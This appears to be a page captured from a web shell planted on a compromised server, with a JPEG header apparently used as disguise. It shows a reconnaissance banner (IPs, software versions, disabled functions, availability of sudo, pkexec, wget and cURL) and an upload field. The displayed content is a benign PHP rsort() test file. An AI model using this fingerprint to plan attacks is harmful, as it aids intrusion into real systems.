????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.219.32.237 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/array/ |
Upload File : |
--TEST-- Test rsort() function : usage variations - mixed associative arrays --FILE-- <?php /* Prototype : bool rsort(array &$array_arg [, int $sort_flags]) * Description: Sort an array in reverse order * Source code: ext/standard/array.c */ /* * Pass rsort() associative arrays to test key re-assignment */ echo "*** Testing rsort() : variation ***\n"; // Associative arrays $various_arrays = array( // numeric assoc. only array array(5 => 55, 6 => 66, 2 => 22, 3 => 33, 1 => 11), // two-dimensional assoc. and default key array array("fruits" => array("a" => "orange", "b" => "banana", "c" => "apple"), "numbers" => array(1, 2, 3, 4, 5, 6), "holes" => array("first", 5 => "second", "third")), // numeric assoc. and default key array array(1, 1, 8 => 1, 4 => 1, 19, 3 => 13), // mixed assoc. array array('bar' => 'baz', "foo" => 1), // assoc. only multi-dimensional array array('a' => 1,'b' => array('e' => 2,'f' => 3),'c' => array('g' => 4),'d' => 5), ); $count = 1; // loop through to test rsort() with different arrays, // to test the new keys for the elements in the sorted array foreach ($various_arrays as $array) { echo "\n-- Iteration $count --\n"; echo "-- Sort flag = default --\n"; $temp_array = $array; var_dump(rsort($temp_array) ); var_dump($temp_array); echo "-- Sort flag = SORT_REGULAR --\n"; $temp_array = $array; var_dump(rsort($temp_array, SORT_REGULAR) ); var_dump($temp_array); $count++; } echo "Done"; ?> --EXPECTF-- *** Testing rsort() : variation *** -- Iteration 1 -- -- Sort flag = default -- bool(true) array(5) { [0]=> int(66) [1]=> int(55) [2]=> int(33) [3]=> int(22) [4]=> int(11) } -- Sort flag = SORT_REGULAR -- bool(true) array(5) { [0]=> int(66) [1]=> int(55) [2]=> int(33) [3]=> int(22) [4]=> int(11) } -- Iteration 2 -- -- Sort flag = default -- bool(true) array(3) { [0]=> array(6) { [0]=> int(1) [1]=> int(2) [2]=> int(3) [3]=> int(4) [4]=> int(5) [5]=> int(6) } [1]=> array(3) { [0]=> string(5) "first" [5]=> string(6) "second" [6]=> string(5) "third" } [2]=> array(3) { ["a"]=> string(6) "orange" ["b"]=> string(6) "banana" ["c"]=> string(5) "apple" } } -- Sort flag = SORT_REGULAR -- bool(true) array(3) { [0]=> array(6) { [0]=> int(1) [1]=> int(2) [2]=> int(3) [3]=> int(4) [4]=> int(5) [5]=> int(6) } [1]=> array(3) { [0]=> string(5) "first" [5]=> string(6) "second" [6]=> string(5) "third" } [2]=> array(3) { ["a"]=> string(6) "orange" ["b"]=> string(6) "banana" ["c"]=> string(5) "apple" } } -- Iteration 3 -- -- Sort flag = default -- bool(true) array(6) { [0]=> int(19) [1]=> int(13) [2]=> int(1) [3]=> int(1) [4]=> int(1) [5]=> int(1) } -- Sort flag = SORT_REGULAR -- bool(true) array(6) { [0]=> int(19) [1]=> int(13) [2]=> int(1) [3]=> int(1) [4]=> int(1) [5]=> int(1) } -- Iteration 4 -- -- Sort flag = default -- bool(true) array(2) { [0]=> int(1) [1]=> string(3) "baz" } -- Sort flag = SORT_REGULAR -- bool(true) array(2) { [0]=> int(1) [1]=> string(3) "baz" } -- Iteration 5 -- -- Sort flag = default -- bool(true) array(4) { [0]=> array(2) { ["e"]=> int(2) ["f"]=> int(3) } [1]=> array(1) { ["g"]=> int(4) } [2]=> int(5) [3]=> int(1) } -- Sort flag = SORT_REGULAR -- bool(true) array(4) { [0]=> array(2) { ["e"]=> int(2) ["f"]=> int(3) } [1]=> array(1) { ["g"]=> int(4) } [2]=> int(5) [3]=> int(1) } Done